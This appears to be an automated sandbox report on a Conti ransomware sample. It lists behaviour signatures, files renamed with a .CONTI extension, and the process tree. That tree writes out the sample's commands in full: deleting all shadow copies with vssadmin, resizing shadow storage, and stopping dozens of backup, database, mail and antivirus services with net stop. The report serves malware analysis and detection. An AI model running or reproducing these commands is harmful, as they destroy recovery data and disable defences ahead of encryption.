Analysis Overview
SHA256
1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24
Threat Level: Known bad
The file 1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.exe was found to be: Known bad.
Malicious Activity Summary
Conti Ransomware
Deletes shadow copies
Modifies extensions of user files
Drops desktop.ini file(s)
Enumerates connected drives
Interacts with shadow copies
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-05-09 15:19
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-05-09 15:19
Reported
2022-05-09 15:21
Platform
win7-20220414-en
Max time kernel
40s
Max time network
45s
Command Line
Signatures
Conti Ransomware
Deletes shadow copies
Modifies extensions of user files
| Description | Indicator | Process | Target |
| File renamed | C:\Users\Admin\Pictures\MergeUnlock.png => C:\Users\Admin\Pictures\MergeUnlock.png.CONTI | C:\Users\Admin\AppData\Local\Temp\1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\EnableOpen.tif => C:\Users\Admin\Pictures\EnableOpen.tif.CONTI | C:\Users\Admin\AppData\Local\Temp\1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\EnablePublish.png => C:\Users\Admin\Pictures\EnablePublish.png.CONTI | C:\Users\Admin\AppData\Local\Temp\1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\SplitCompress.tif => C:\Users\Admin\Pictures\SplitCompress.tif.CONTI | C:\Users\Admin\AppData\Local\Temp\1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\WatchSearch.png => C:\Users\Admin\Pictures\WatchSearch.png.CONTI | C:\Users\Admin\AppData\Local\Temp\1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\CompareRemove.tif => C:\Users\Admin\Pictures\CompareRemove.tif.CONTI | C:\Users\Admin\AppData\Local\Temp\1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\PublishConvertTo.raw => C:\Users\Admin\Pictures\PublishConvertTo.raw.CONTI | C:\Users\Admin\AppData\Local\Temp\1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\UnlockEnter.crw => C:\Users\Admin\Pictures\UnlockEnter.crw.CONTI | C:\Users\Admin\AppData\Local\Temp\1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.exe | N/A |
Drops desktop.ini file(s)
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\D: | C:\Windows\SysWOW64\vssadmin.exe | N/A |
| File opened (read-only) | \??\e: | C:\Windows\SysWOW64\vssadmin.exe | N/A |
| File opened (read-only) | \??\f: | C:\Windows\SysWOW64\vssadmin.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\SysWOW64\vssadmin.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\SysWOW64\vssadmin.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\SysWOW64\vssadmin.exe | N/A |
| File opened (read-only) | \??\f: | C:\Windows\SysWOW64\vssadmin.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\SysWOW64\vssadmin.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\SysWOW64\vssadmin.exe | N/A |
| File opened (read-only) | \??\e: | C:\Windows\SysWOW64\vssadmin.exe | N/A |
| File opened (read-only) | \??\g: | C:\Windows\SysWOW64\vssadmin.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\SysWOW64\vssadmin.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\SysWOW64\vssadmin.exe | N/A |
| File opened (read-only) | \??\h: | C:\Windows\SysWOW64\vssadmin.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\SysWOW64\vssadmin.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\SysWOW64\vssadmin.exe | N/A |
| File opened (read-only) | \??\g: | C:\Windows\SysWOW64\vssadmin.exe | N/A |
| File opened (read-only) | \??\h: | C:\Windows\SysWOW64\vssadmin.exe | N/A |
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\vssadmin.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.exe
"C:\Users\Admin\AppData\Local\Temp\1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c vssadmin Delete Shadows /all /quiet
C:\Windows\SysWOW64\vssadmin.exe
vssadmin Delete Shadows /all /quiet
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
C:\Windows\SysWOW64\vssadmin.exe
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
C:\Windows\SysWOW64\vssadmin.exe
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
C:\Windows\SysWOW64\vssadmin.exe
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
C:\Windows\SysWOW64\vssadmin.exe
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\Windows\SysWOW64\vssadmin.exe
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
C:\Windows\SysWOW64\vssadmin.exe
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
C:\Windows\SysWOW64\vssadmin.exe
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
C:\Windows\SysWOW64\vssadmin.exe
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
C:\Windows\SysWOW64\vssadmin.exe
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
C:\Windows\SysWOW64\vssadmin.exe
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
C:\Windows\SysWOW64\vssadmin.exe
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\Windows\SysWOW64\vssadmin.exe
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c vssadmin Delete Shadows /all /quiet
C:\Windows\SysWOW64\vssadmin.exe
vssadmin Delete Shadows /all /quiet
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop "Acronis VSS Provider" /y
C:\Windows\SysWOW64\net.exe
net stop "Acronis VSS Provider" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "Acronis VSS Provider" /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop "Enterprise Client Service" /y
C:\Windows\SysWOW64\net.exe
net stop "Enterprise Client Service" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "Enterprise Client Service" /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop "SQLsafe Backup Service" /y
C:\Windows\SysWOW64\net.exe
net stop "SQLsafe Backup Service" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "SQLsafe Backup Service" /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop "SQLsafe Filter Service" /y
C:\Windows\SysWOW64\net.exe
net stop "SQLsafe Filter Service" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "SQLsafe Filter Service" /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop "Veeam Backup Catalog Data Service" /y
C:\Windows\SysWOW64\net.exe
net stop "Veeam Backup Catalog Data Service" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "Veeam Backup Catalog Data Service" /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop AcronisAgent /y
C:\Windows\SysWOW64\net.exe
net stop AcronisAgent /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop AcrSch2Svc /y
C:\Windows\SysWOW64\net.exe
net stop AcrSch2Svc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop Antivirus /y
C:\Windows\SysWOW64\net.exe
net stop Antivirus /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Antivirus /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop ARSM /y
C:\Windows\SysWOW64\net.exe
net stop ARSM /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ARSM /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop BackupExecAgentAccelerator /y
C:\Windows\SysWOW64\net.exe
net stop BackupExecAgentAccelerator /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop BackupExecAgentBrowser /y
C:\Windows\SysWOW64\net.exe
net stop BackupExecAgentBrowser /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop BackupExecDeviceMediaService /y
C:\Windows\SysWOW64\net.exe
net stop BackupExecDeviceMediaService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecDeviceMediaService /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop BackupExecJobEngine /y
C:\Windows\SysWOW64\net.exe
net stop BackupExecJobEngine /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecJobEngine /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop BackupExecManagementService /y
C:\Windows\SysWOW64\net.exe
net stop BackupExecManagementService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecManagementService /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop BackupExecRPCService /y
C:\Windows\SysWOW64\net.exe
net stop BackupExecRPCService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecRPCService /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop BackupExecVSSProvider /y
C:\Windows\SysWOW64\net.exe
net stop BackupExecVSSProvider /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecVSSProvider /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop bedbg /y
C:\Windows\SysWOW64\net.exe
net stop bedbg /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop bedbg /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop DCAgent /y
C:\Windows\SysWOW64\net.exe
net stop DCAgent /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop DCAgent /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop EPSecurityService /y
C:\Windows\SysWOW64\net.exe
net stop EPSecurityService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EPSecurityService /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop EPUpdateService /y
C:\Windows\SysWOW64\net.exe
net stop EPUpdateService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EPUpdateService /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop EraserSvc11710 /y
C:\Windows\SysWOW64\net.exe
net stop EraserSvc11710 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EraserSvc11710 /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop EsgShKernel /y
C:\Windows\SysWOW64\net.exe
net stop EsgShKernel /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EsgShKernel /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop FA_Scheduler /y
C:\Windows\SysWOW64\net.exe
net stop FA_Scheduler /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop FA_Scheduler /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop IISAdmin /y
C:\Windows\SysWOW64\net.exe
net stop IISAdmin /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop IISAdmin /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop IMAP4Svc /y
C:\Windows\SysWOW64\net.exe
net stop IMAP4Svc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop IMAP4Svc /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop McShield /y
C:\Windows\SysWOW64\net.exe
net stop McShield /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McShield /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop McTaskManager /y
C:\Windows\SysWOW64\net.exe
net stop McTaskManager /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McTaskManager /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop mfemms /y
C:\Windows\SysWOW64\net.exe
net stop mfemms /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfemms /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop mfevtp /y
C:\Windows\SysWOW64\net.exe
net stop mfevtp /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfevtp /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MMS /y
C:\Windows\SysWOW64\net.exe
net stop MMS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MMS /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop mozyprobackup /y
C:\Windows\SysWOW64\net.exe
net stop mozyprobackup /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mozyprobackup /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MsDtsServer /y
C:\Windows\SysWOW64\net.exe
net stop MsDtsServer /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MsDtsServer /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MsDtsServer100 /y
C:\Windows\SysWOW64\net.exe
net stop MsDtsServer100 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MsDtsServer100 /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MsDtsServer110 /y
C:\Windows\SysWOW64\net.exe
net stop MsDtsServer110 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MsDtsServer110 /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSExchangeES /y
C:\Windows\SysWOW64\net.exe
net stop MSExchangeES /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeES /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSExchangeIS /y
C:\Windows\SysWOW64\net.exe
net stop MSExchangeIS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeIS /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSExchangeMGMT /y
C:\Windows\SysWOW64\net.exe
net stop MSExchangeMGMT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeMGMT /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSExchangeMTA /y
C:\Windows\SysWOW64\net.exe
net stop MSExchangeMTA /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeMTA /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSExchangeSA /y
C:\Windows\SysWOW64\net.exe
net stop MSExchangeSA /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeSA /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSExchangeSRS /y
C:\Windows\SysWOW64\net.exe
net stop MSExchangeSRS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeSRS /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSOLAP$SQL_2008 /y
C:\Windows\SysWOW64\net.exe
net stop MSOLAP$SQL_2008 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSOLAP$SYSTEM_BGC /y
C:\Windows\SysWOW64\net.exe
net stop MSOLAP$SYSTEM_BGC /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSOLAP$TPS /y
C:\Windows\SysWOW64\net.exe
net stop MSOLAP$TPS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSOLAP$TPS /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSOLAP$TPSAMA /y
C:\Windows\SysWOW64\net.exe
net stop MSOLAP$TPSAMA /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSOLAP$TPSAMA /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQL$BKUPEXEC /y
C:\Windows\SysWOW64\net.exe
net stop MSSQL$BKUPEXEC /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQL$ECWDB2 /y
C:\Windows\SysWOW64\net.exe
net stop MSSQL$ECWDB2 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$ECWDB2 /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQL$PRACTICEMGT /y
C:\Windows\SysWOW64\net.exe
net stop MSSQL$PRACTICEMGT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQL$PRACTTICEBGC /y
C:\Windows\SysWOW64\net.exe
net stop MSSQL$PRACTTICEBGC /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQL$PROFXENGAGEMENT /y
C:\Windows\SysWOW64\net.exe
net stop MSSQL$PROFXENGAGEMENT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQL$SBSMONITORING /y
C:\Windows\SysWOW64\net.exe
net stop MSSQL$SBSMONITORING /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQL$SHAREPOINT /y
C:\Windows\SysWOW64\net.exe
net stop MSSQL$SHAREPOINT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQL$SQL_2008 /y
C:\Windows\SysWOW64\net.exe
net stop MSSQL$SQL_2008 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SQL_2008 /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQL$SYSTEM_BGC /y
C:\Windows\SysWOW64\net.exe
net stop MSSQL$SYSTEM_BGC /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQL$TPS /y
C:\Windows\SysWOW64\net.exe
net stop MSSQL$TPS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$TPS /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQL$TPSAMA /y
C:\Windows\SysWOW64\net.exe
net stop MSSQL$TPSAMA /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$TPSAMA /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQL$VEEAMSQL2008R2 /y
C:\Windows\SysWOW64\net.exe
net stop MSSQL$VEEAMSQL2008R2 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQL$VEEAMSQL2012 /y
C:\Windows\SysWOW64\net.exe
net stop MSSQL$VEEAMSQL2012 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQLFDLauncher /y
C:\Windows\SysWOW64\net.exe
net stop MSSQLFDLauncher /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
C:\Windows\SysWOW64\net.exe
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQLFDLauncher$SBSMONITORING /y
C:\Windows\SysWOW64\net.exe
net stop MSSQLFDLauncher$SBSMONITORING /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQLFDLauncher$SHAREPOINT /y
C:\Windows\SysWOW64\net.exe
net stop MSSQLFDLauncher$SHAREPOINT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQLFDLauncher$SQL_2008 /y
C:\Windows\SysWOW64\net.exe
net stop MSSQLFDLauncher$SQL_2008 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQLFDLauncher$SYSTEM_BGC /y
C:\Windows\SysWOW64\net.exe
net stop MSSQLFDLauncher$SYSTEM_BGC /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQLFDLauncher$TPS /y
C:\Windows\SysWOW64\net.exe
net stop MSSQLFDLauncher$TPS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQLFDLauncher$TPSAMA /y
C:\Windows\SysWOW64\net.exe
net stop MSSQLFDLauncher$TPSAMA /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQLSERVER /y
C:\Windows\SysWOW64\net.exe
net stop MSSQLSERVER /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLSERVER /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQLServerADHelper100 /y
C:\Windows\SysWOW64\net.exe
net stop MSSQLServerADHelper100 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper100 /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQLServerOLAPService /y
C:\Windows\SysWOW64\net.exe
net stop MSSQLServerOLAPService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLServerOLAPService /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MySQL57 /y
C:\Windows\SysWOW64\net.exe
net stop MySQL57 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MySQL57 /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop ntrtscan /y
C:\Windows\SysWOW64\net.exe
net stop ntrtscan /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ntrtscan /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop OracleClientCache80 /y
C:\Windows\SysWOW64\net.exe
net stop OracleClientCache80 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop OracleClientCache80 /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop PDVFSService /y
C:\Windows\SysWOW64\net.exe
net stop PDVFSService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop PDVFSService /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop POP3Svc /y
C:\Windows\SysWOW64\net.exe
net stop POP3Svc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop POP3Svc /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop ReportServer /y
C:\Windows\SysWOW64\net.exe
net stop ReportServer /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop ReportServer$SQL_2008 /y
C:\Windows\SysWOW64\net.exe
net stop ReportServer$SQL_2008 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop ReportServer$SYSTEM_BGC /y
C:\Windows\SysWOW64\net.exe
net stop ReportServer$SYSTEM_BGC /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop ReportServer$TPS /y
C:\Windows\SysWOW64\net.exe
net stop ReportServer$TPS /y
C:\Windows\SysWOW64\net1.exe
